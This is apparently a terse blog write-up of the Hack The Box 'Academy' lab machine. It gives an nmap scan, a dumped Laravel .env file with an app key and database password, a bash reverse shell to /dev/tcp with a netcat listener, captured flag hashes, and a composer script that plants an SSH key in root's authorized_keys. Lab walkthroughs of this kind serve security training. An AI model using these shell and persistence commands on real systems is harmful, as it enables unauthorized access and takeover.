# Academy

**Published by:** [Avalon](https://paragraph.com/@avalon-2/)
**Published on:** 2021-12-01
**URL:** https://paragraph.com/@avalon-2/academy

## Content

# Nmap 7.91 scan initiated Sun Nov 29 13:49:16 2020 as: nmap -sC -sV -Pn -oA Academy 10.10.10.215 Nmap scan report for 10.10.10.215 Host is up (0.24s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA) | 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA) |_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Did not follow redirect to http://academy.htb/ 88/tcp filtered kerberos-sec Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Nov 29 13:54:29 2020 -- 1 IP address (1 host up) scanned in 312.78 seconds 修改Hosts10.10.10.215 academy.htb 用户权限再次修改Hosts10.10.10.215 academy.htb dev-staging-01.academy.htb 进入http://dev-staging-01.academy.htb发现关键词LaravelCommand ~> cat /var/www/html/academy/.env APP_NAME=Laravel APP_ENV=local APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= APP_DEBUG=false APP_URL=http://localhost LOG_CHANNEL=stack DB_CONNECTION=mysql DB_HOST=127.0.0.1 DB_PORT=3306 DB_DATABASE=academy DB_USERNAME=dev DB_PASSWORD=mySup3rP4s5w0rd!! BROADCAST_DRIVER=log CACHE_DRIVER=file SESSION_DRIVER=file SESSION_LIFETIME=120 QUEUE_DRIVER=sync REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 MAIL_DRIVER=smtp MAIL_HOST=smtp.mailtrap.io MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= PUSHER_APP_CLUSTER=mt1 MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}" MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}" remote nc -l 1234 local bash -c 'bash -i >&#x26; /dev/tcp/10.10.15.XX/1234 0>&#x26;1' b11122e303dae8ceeee215804f60a119mrb3n_Ac@d3my!{ "scripts": { "command": "mkdir /root/.ssh; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTX2FPNH+e2PHPtZIpd6PxXZpZmKySBaSjpEftPu+dEEVRF/CNSn1GWtnCO4YjD0r3scAjMXFMWP0J17ibFR1SQ+x+DHKRubR/sh3ZH2BPr30yYPzC+TXHFELSiEvwllcfTCDTvmUzoposuC4wnuI/eaVDPRBzn3ke9zHI0WgbJxInjTYL2XElRg1NdwsihCK5HBZnfgNIrW8s+5J4G3DgF2Zl+1BOAd+CuNvEGSx/ZZPI2TGClJW1A+rVYJ+U5052kZQMvRzdB53vCagivIRYEkNacz33ztjbzR1sW6f5r7oMrOBw6KO75/8+PlcrvrtpPOX8sniX34C4w/KYooxJDc6HsiGDZHmFUq3eHpRvd6EG1JtPQQroiw+K/ajSORuMzfC+SSFVb8MumxBeI2n9yEmAhYaraAX2ZdP/YX0aQ8X4qddgS+5TPa1SGhhnUJuS0Ke7tX+Xtj/vP3QHcTjUVYj65rdk5iLfyPJZFUuAU+QiCuUfWEtwZy/f636yKhM= xiaming@bixin.cn' >> /root/.ssh/authorized_keys" } } e8065ea83707204ed3f153f94cbddbb7

## Publication Information

- [Avalon](https://paragraph.com/@avalon-2/): Publication homepage
- [All Posts](https://paragraph.com/@avalon-2/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@avalon-2): Subscribe to updates